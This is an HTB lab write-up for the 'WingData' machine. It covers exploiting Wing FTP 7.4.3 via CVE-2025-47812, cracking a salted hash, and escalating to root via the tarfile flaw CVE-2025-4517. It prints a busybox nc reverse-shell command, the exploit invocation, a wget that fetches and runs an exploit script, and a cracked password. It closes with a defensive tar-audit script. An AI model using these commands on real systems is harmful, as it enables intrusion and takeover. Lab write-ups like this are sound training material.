
🪶 HTB WingData — Solution Notes

Platform: Hack The Box — Season 10
Machine: WingData
OS: Linux (Debian 12)
Difficulty: Easy
Date: March 30, 2026
CVEs: CVE-2025-47812 · CVE-2025-4517


🗺️ Attack Chain

Nmap → /etc/hosts → Web recon (wingdata.htb) → ftp.wingdata.htb (Wing FTP v7.4.3) → CVE-2025-47812 (busybox reverse shell) → wingftp shell → wacky.xml (SHA256 hash) → hashcat (salt: WingFTP) → wacky SSH login → sudo -l → CVE-2025-4517 (tarfile PATH_MAX bypass) → ROOT


🧠 How Does a Hacker Think? — Before You Begin

When starting a machine, the first question in your mind should be: "How wide is this system's exposed attack surface?"

1️⃣ Reconnaissance

Port Scanning

bash

nmap -sV -sC -p- --min-rate 5000 10.129.244.106

Findings:

/etc/hosts Setup

💡 Why Does /etc/hosts Matter?

bash

echo "10.129.244.106 wingdata.htb ftp.wingdata.htb" | sudo tee -a /etc/hosts

Web Discovery

The "Client Portal" button on the homepage redirects to http://ftp.wingdata.htb/.

bash

curl -s http://wingdata.htb/ | grep -i "href\|client\|ftp"

Version information found at the bottom of the ftp.wingdata.htb login page:

bash

curl -s http://ftp.wingdata.htb/login.html | grep -i "version\|wing"
# Wing FTP Server v7.4.3


🧠 How Does a Hacker Think? — After Finding a Version Number

Once you find a software version, the first thing to do is: search CVE databases.

2️⃣ Initial Access — Wing FTP RCE (CVE-2025-47812)

💡 What is CVE-2025-47812?

Download the Exploit

bash

searchsploit -m multiple/remote/52347.py

Listener

bash

nc -lvnp 4444

Exploit

bash

python3 52347.py -u http://ftp.wingdata.htb \
  -c "busybox nc 10.10.14.26 4444 -e /bin/bash" -v

Shell Stabilization

bash

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg

User: wingftp


🚩 User Flag

The flag is not accessible as wingftp — we need to get to the wacky user first. Start by finding the hash:

bash

cat /opt/wftpserver/Data/1/users/wacky.xml

Hash found: 32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca


3️⃣ Lateral Movement — Hash Cracking

💡 Wing FTP Password Format

Hashcat

bash

echo "32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP" > wacky_hash.txt
hashcat -m 1410 wacky_hash.txt /usr/share/wordlists/rockyou.txt

Result: wacky : !#7Blushing^*Bride5

SSH Login

bash

ssh wacky@10.129.244.106
# Password: !#7Blushing^*Bride5

bash

cat ~/user.txt


🧠 How Does a Hacker Think? — The Path to Root

We're now wacky. Time for systematic enumeration for root:

4️⃣ Privilege Escalation — CVE-2025-4517

💡 What is CVE-2025-4517?

Sudo Privileges

bash

sudo -l
# (root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

Download and Run the Exploit Script (on the target machine)

bash

wget http://10.10.14.26:8080/cve_tar.py -O /tmp/cve_tar.py
python3 /tmp/cve_tar.py --create-only

What the script does:

Result: wacky added to sudoers → sudo /bin/bash → ROOT! 🎉


🚩 Root Flag

bash

sudo /bin/bash
cat /root/root.txt


📚 Concepts Learned


🔑 General Hacker Mindset Summary

  1. Follow the links on the main page: Buttons like "Client Portal" can lead you to other subdomains.
  2. Search for CVEs immediately after finding a version: The searchsploit + Google combination is powerful.
  3. If the reverse shell doesn't work, try busybox: busybox nc IP PORT -e /bin/bash is much more reliable.
  4. Config files are a credential goldmine: /opt/wftpserver/Data/1/users/*.xml contained hashes and the salt.
  5. sudo -l is always the first check: Permission to run a script = potential privesc vector.
  6. "Secure" features can have CVEs too: filter="data" was considered safe — until CVE-2025-4517 bypassed it.
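
On the defensive side of item 6, a privileged restore script can audit archive members before extraction instead of relying on filter="data" alone. The following is an added example, not code from this write-up or from the machine's restore_backup_clients.py; audit_tar, build_sample, the /srv/restore destination and the length limits are assumptions, and the policy rejects every link member outright.

```python
import io
import os
import tarfile

# Assumed policy limits (not from the page), kept far below Linux PATH_MAX (4096).
MAX_MEMBER_PATH = 1024
MAX_COMPONENT = 255

def audit_tar(fileobj, dest="/srv/restore"):  # dest is a hypothetical restore dir
    """List (member, reason) findings without extracting; empty list = accept."""
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for m in tar:
            parts = m.name.split("/")
            if m.issym() or m.islnk():
                findings.append((m.name, "link member -> %r" % m.linkname))
            elif not (m.isreg() or m.isdir()):
                findings.append((m.name, "special file"))
            if m.name.startswith("/") or ".." in parts:
                findings.append((m.name, "absolute path or '..' component"))
            if len(os.path.join(dest, m.name)) > MAX_MEMBER_PATH:
                findings.append((m.name, "path length near PATH_MAX"))
            if any(len(p) > MAX_COMPONENT for p in parts):
                findings.append((m.name, "overlong path component"))
    return findings

def build_sample(members):
    """Build a constructed in-memory archive from (name, type, linkname) tuples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, typ, link in members:
            info = tarfile.TarInfo(name)
            info.type, info.linkname = typ, link
            tar.addfile(info)
    buf.seek(0)
    return buf

# Constructed sample inputs, not taken from the machine.
CLEAN = [("clients", tarfile.DIRTYPE, ""), ("clients/a.json", tarfile.REGTYPE, "")]
SUSPECT = [("clients/link", tarfile.SYMTYPE, "some/other/dir"),
           ("/".join(["d" * 200] * 6) + "/f", tarfile.REGTYPE, "")]

if __name__ == "__main__":
    for label, spec in (("clean", CLEAN), ("suspect", SUSPECT)):
        result = audit_tar(build_sample(spec))
        print(label, "ACCEPT" if not result else "REJECT")
        for name, reason in result:
            print("   ", name[:40], "-", reason)
```

Updating the Python interpreter remains the primary fix; a check like this is defense in depth for scripts that extract untrusted archives under sudo.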